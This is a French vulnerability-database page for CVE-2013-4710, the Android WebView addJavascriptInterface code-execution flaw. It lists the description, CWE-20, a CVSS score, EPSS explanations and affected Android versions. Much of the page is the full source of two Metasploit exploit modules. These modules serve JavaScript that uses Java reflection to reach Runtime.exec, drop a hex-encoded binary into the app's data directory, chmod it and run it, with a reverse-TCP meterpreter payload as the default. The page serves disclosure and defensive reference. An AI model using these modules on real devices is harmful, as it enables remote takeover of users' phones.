CVE-2013-4710 : Détail

CVE-2013-4710

A03-Injection
3.78%V3
Network
2014-03-03
01h00 +00:00
2014-03-03
00h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, SoftBank, and other devices does not properly implement the WebView class, which allows remote attackers to execute arbitrary methods of Java objects or cause a denial of service (reboot) via a crafted web page, as demonstrated by use of the WebView.addJavascriptInterface method, a related issue to CVE-2012-6636.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 41675

Date de publication : 2012-12-20 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/android' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Android VULN_CHECK_JS = %Q| for (i in top) { try { top[i].getClass().forName('java.lang.Runtime'); is_vuln = true; break; } catch(e) {} } | autopwn_info( :os_name => OperatingSystems::Match::ANDROID, :arch => ARCH_ARMLE, :javascript => true, :rank => ExcellentRanking, :vuln_test => VULN_CHECK_JS ) def initialize(info = {}) super(update_info(info, 'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution', 'Description' => %q{ This module exploits a privilege escalation issue in Android < 4.2's WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection APIs exposed by the Interface and execute arbitrary commands. Some distributions of the Android Browser app have an addJavascriptInterface call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs 4.1.2 release of Android is known to be vulnerable. A secondary attack vector involves the WebViews embedded inside a large number of Android applications. Ad integrations are perhaps the worst offender here. If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS into the page displayed in the WebView, then you can inject the html/js served by this module and get a shell. Note: Adding a .js to the URL will return plain javascript (no HTML markup). }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck', # original msf module 'joev' # static server ], 'References' => [ ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'], ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'], ['URL', 'http://50.56.33.56/blog/?p=314'], ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'], ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'], ['CVE', '2012-6636'], # original CVE for addJavascriptInterface ['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_) ['EDB', '31519'], ['OSVDB', '97520'] ], 'Platform' => ['android', 'linux'], 'Arch' => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE], 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' }, 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => 'Dec 21 2012', 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :os_name => OperatingSystems::Match::ANDROID, :vuln_test => VULN_CHECK_JS, :vuln_test_error => 'No vulnerable Java objects were found in this web context.' } )) deregister_options('JsObfuscate') end # Hooked to prevent BrowserExploitServer from attempting to do JS detection # on requests for the static javascript file def on_request_uri(cli, req) if req.uri =~ /\.js/ serve_static_js(cli, req) else super end end # The browser appears to be vulnerable, serve the exploit def on_request_exploit(cli, req, browser) arch = normalize_arch(browser[:arch]) print_status "Serving #{arch} exploit..." send_response_html(cli, html(arch)) end # Called when a client requests a .js route. # This is handy for post-XSS. def serve_static_js(cli, req) arch = req.qstring['arch'] response_opts = { 'Content-type' => 'text/javascript' } if arch.present? print_status("Serving javascript for arch #{normalize_arch arch}") send_response(cli, add_javascript_interface_exploit_js(normalize_arch arch), response_opts) else print_status("Serving arch detection javascript") send_response(cli, static_arch_detect_js, response_opts) end end # This is served to requests for the static .js file. # Because we have to use javascript to detect arch, we have 3 different # versions of the static .js file (x86/mips/arm) to choose from. This # small snippet of js detects the arch and requests the correct file. def static_arch_detect_js %Q| var arches = {}; arches['#{ARCH_ARMLE}'] = /arm/i; arches['#{ARCH_MIPSLE}'] = /mips/i; arches['#{ARCH_X86}'] = /x86/i; var arch = null; for (var name in arches) { if (navigator.platform.toString().match(arches[name])) { arch = name; break; } } if (arch) { // load the script with the correct arch var script = document.createElement('script'); script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch); script.setAttribute('type', 'text/javascript'); // ensure body is parsed and we won't be in an uninitialized state setTimeout(function(){ var node = document.body \|\| document.head; node.appendChild(script); }, 100); } | end # @return [String] normalized client architecture def normalize_arch(arch) if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end end def html(arch) "<!doctype html><html><body><script>#{add_javascript_interface_exploit_js(arch)}</script></body></html>" end end
Exploit Database EDB-ID : 31519

Date de publication : 2014-02-06 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_flavor => "Android", :arch => ARCH_ARMLE, :javascript => true, :rank => ExcellentRanking, :vuln_test => %Q| for (i in top) { try { top[i].getClass().forName('java.lang.Runtime'); is_vuln = true; break; } catch(e) {} } | }) def initialize(info = {}) super(update_info(info, 'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution', 'Description' => %q{ This module exploits a privilege escalation issue in Android < 4.2's WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection APIs exposed by the Interface and execute arbitrary commands. Some distributions of the Android Browser app have an addJavascriptInterface call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs 4.1.2 release of Android is known to be vulnerable. A secondary attack vector involves the WebViews embedded inside a large number of Android applications. Ad integrations are perhaps the worst offender here. If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS into the page displayed in the WebView, then you can inject the html/js served by this module and get a shell. Note: Adding a .js to the URL will return plain javascript (no HTML markup). }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck', # original msf module 'joev' # static server ], 'References' => [ ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-'+ 'addjavascriptinterface-code-execution-vulnerability/'], ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'], ['URL', 'http://50.56.33.56/blog/?p=314'], ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-'+ 'addjavascriptinterface-remote-code-execution/'] ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'DefaultOptions' => { 'PrependFork' => true }, 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => 'Dec 21 2012', 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :os_flavor => "Android", :arch => ARCH_ARMLE } )) end def on_request_uri(cli, req) if req.uri.end_with?('js') print_status("Serving javascript") send_response(cli, js, 'Content-type' => 'text/javascript') else super end end def on_request_exploit(cli, req, browser) print_status("Serving exploit HTML") send_response_html(cli, html) end def js %Q| function exec(obj) { // ensure that the object contains a native interface try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } // get the runtime so we can exec var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}"; // get the process name, which will give us our data path var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } path += '/#{Rex::Text.rand_text_alpha(8)}'; // build the binary, chmod it, and execute it m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor(); m.invoke(null, null).exec(['chmod', '700', path]).waitFor(); m.invoke(null, null).exec([path]); return true; } for (i in top) { if (exec(top[i]) === true) break; } | end def html "<!doctype html><html><body><script>#{js}</script></body></html>" end end

Products Mentioned

Configuraton 0

Google>>Android >> Version 3.0

Google>>Android >> Version 3.1

Google>>Android >> Version 3.2

Google>>Android >> Version 3.2.1

Google>>Android >> Version 3.2.2

Google>>Android >> Version 3.2.4

Google>>Android >> Version 3.2.6

Google>>Android >> Version 4.0

Google>>Android >> Version 4.0.1

Google>>Android >> Version 4.0.2

Google>>Android >> Version 4.0.3

Google>>Android >> Version 4.0.4

Google>>Android >> Version 4.1

Google>>Android >> Version 4.1.2

Références

http://jvn.jp/en/jp/JVN53768697/index.html
Tags : third-party-advisory, x_refsource_JVN
http://openwall.com/lists/oss-security/2014/02/18/11
Tags : mailing-list, x_refsource_MLIST
http://50.56.33.56/blog/?p=314
Tags : x_refsource_MISC
http://jvndb.jvn.jp/jvndb/JVNDB-2013-000111
Tags : third-party-advisory, x_refsource_JVNDB